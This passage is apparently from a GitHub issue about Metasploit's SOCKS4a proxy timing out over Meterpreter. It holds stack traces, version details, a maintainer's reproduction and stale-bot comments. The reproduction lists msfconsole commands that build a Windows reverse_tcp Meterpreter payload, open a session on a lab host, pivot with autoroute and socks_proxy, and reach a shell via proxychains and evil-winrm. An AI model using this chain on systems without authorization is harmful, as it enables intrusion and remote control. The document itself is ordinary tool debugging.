    /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.54/lib/rex/socket/tcp.rb:28:in `create'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:252:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:315:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 21:56:10] [e(0)] core: Thread Exception: SOCKS4AProxyServerRelay  critical=false    source:
    /usr/share/metasploit-framework/lib/metasploit/framework/thread_factory_provider.rb:25:in `spawn'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `spawn'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:168:in `relay'
    /usr/share/metasploit-framework/lib/rex/proto/proxy/socks4a.rb:314:in `block in start'
    /usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
    /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn' - Rex::TimeoutError Send timed out
Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:181:in `send_request'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:114:in `shutdown'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:96:in `close_write'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:204:in `block (2 levels) in monitor_rsock'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `loop'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-core-0.1.31/lib/rex/io/socket_abstraction.rb:137:in `block in monitor_rsock'
/usr/share/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[10/21/2023 22:03:12] [w(0)] core: Session 1 has died
[10/21/2023 22:58:59] [e(0)] core: Module autoroute not found, and no loading errors found. If you're using a custom module refer to our wiki: https://docs.metasploit.com/docs/using-metasploit/intermediate/running-private-modules.html
[10/21/2023 22:59:03] [w(0)] core: Session 2 has died

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse 
msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse 
Framework: 6.3.38-dev
Ruby: ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.8 7 Feb 2023
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify

@zgoldman-r7
Copy link
Contributor

zgoldman-r7 commented Nov 9, 2023
edited
Loading

I've been able to run through the recreation steps multiple times in a row with no issues.

zgoldman@AUS-MBP-10311 metasploit-framework % ./msfconsole -q
msf6 payload(windows/meterpreter/reverse_http) > use windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 192.168.2.1
lhost => 192.168.2.1
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o payload.exe
[*] Writing 7168 bytes to payload.exe...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.2.1:4444
msf6 payload(windows/x64/meterpreter/reverse_tcp) >
[*] Sending stage (200774 bytes) to 192.168.2.136
[*] Meterpreter session 1 opened (192.168.2.1:4444 -> 192.168.2.136:50151) at 2023-11-10 09:59:10 -0600

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use autoroute

[...]

[*] Using post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against DESKTOP-4CJ773T
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.2.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth Device (Personal Area Network).
[*] Post module execution completed
msf6 post(multi/manage/autoroute) > use socks_proxy

[...]

[*] Using auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > exploit -j
[*] Auxiliary module running as background job 1.

[*] Starting the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) >

zgoldman@AUS-MBP-10311 metasploit-framework % proxychains4 evil-winrm -i ip_here -u username_here -p password_here
[proxychains] config file found: /Users/zgoldman/Documents/R7Code/metasploit-framework/proxychains.conf
[proxychains] preloading /usr/local/Cellar/proxychains-ng/4.16/lib/libproxychains4.dylib

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\vmware-host\Shared Folders\Documents>

@zgoldman-r7 zgoldman-r7 added confirmed Issues confirmed by a committer and removed confirmed Issues confirmed by a committer labels Nov 9, 2023
@github-actions GitHub Actions
Copy link

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Dec 11, 2023
@github-actions GitHub Actions
Copy link

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

No branches or pull requests
2 participants
@mikekhusid @zgoldman-r7